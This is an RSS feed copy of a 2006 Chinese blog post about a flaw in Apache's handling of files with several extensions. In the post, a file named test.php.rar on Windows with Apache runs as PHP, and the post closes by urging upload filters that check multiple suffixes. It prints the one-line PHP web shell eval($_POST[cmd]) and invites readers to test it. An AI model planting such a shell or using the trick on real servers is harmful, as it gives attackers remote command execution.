http://jyqx.spaces.live.com/?_c11_BlogPart_BlogPart=blogview&_c=BlogPart&partqs=catweb%25E5%25AE%2589%25E5%2585%25A8%25E4%25B8%2593%25E9%25A2%2598en-USFri, 08 Aug 2008 02:40:04 GMTFri, 08 Aug 2008 02:40:04 GMTMicrosoft Spaces v1.1http://www.rssboard.org/rss-specification60http://jyqx.spaces.live.com/blog/feed.rssblogcategory-434847513997895356jyqxhttp://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry<div>大家可以尝试编写如下内容的一个php文件，打包成test.php.rar,放到web目录下面，比如<a href="http://localhost/test.php.rar">http://localhost/test.php.rar</a></div> <div> <div> </div> <div>&lt;?php eval($_POST[cmd]);?&gt;</div> <div> </div> <div>然后你可以试试把phpinfo();post到上面的地址，怎么样，，，惊讶了吧，压缩包里面的代码被服务器执行了！</div> <div> </div> <div>这个漏洞也提醒我们，以后处理上传的时候一定要过滤多个后缀</div> <div> </div> <div>我是在windows＋apache下面测试的，如果大家测试没测出问题别拿鸡蛋扔我啊</div> <div> </div></div><img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-434847513997895356&page=RSS%3a+%e6%9e%81%e5%85%b6%e5%8d%b1%e9%99%a9%e7%9a%84.php.rar%e6%bc%8f%e6%b4%9e&referrer=" width="1px" height="1px" border="0" alt=""><img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;NA=1149&amp;PI=73329&amp;RF=&amp;DI=3919&amp;PS=85545&amp;TP=jyqx.spaces.live.com&amp;GT1=jyqx">http://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry#commenthttp://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entryWed, 26 Jul 2006 03:32:50 GMT0blogentryblogentryBlog entryhttp://jyqx.spaces.live.com/blog/cns!F9F71C7D6CB19944!194/comments/feed.rsshttp://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry#comment2006-07-26T03:32:50Z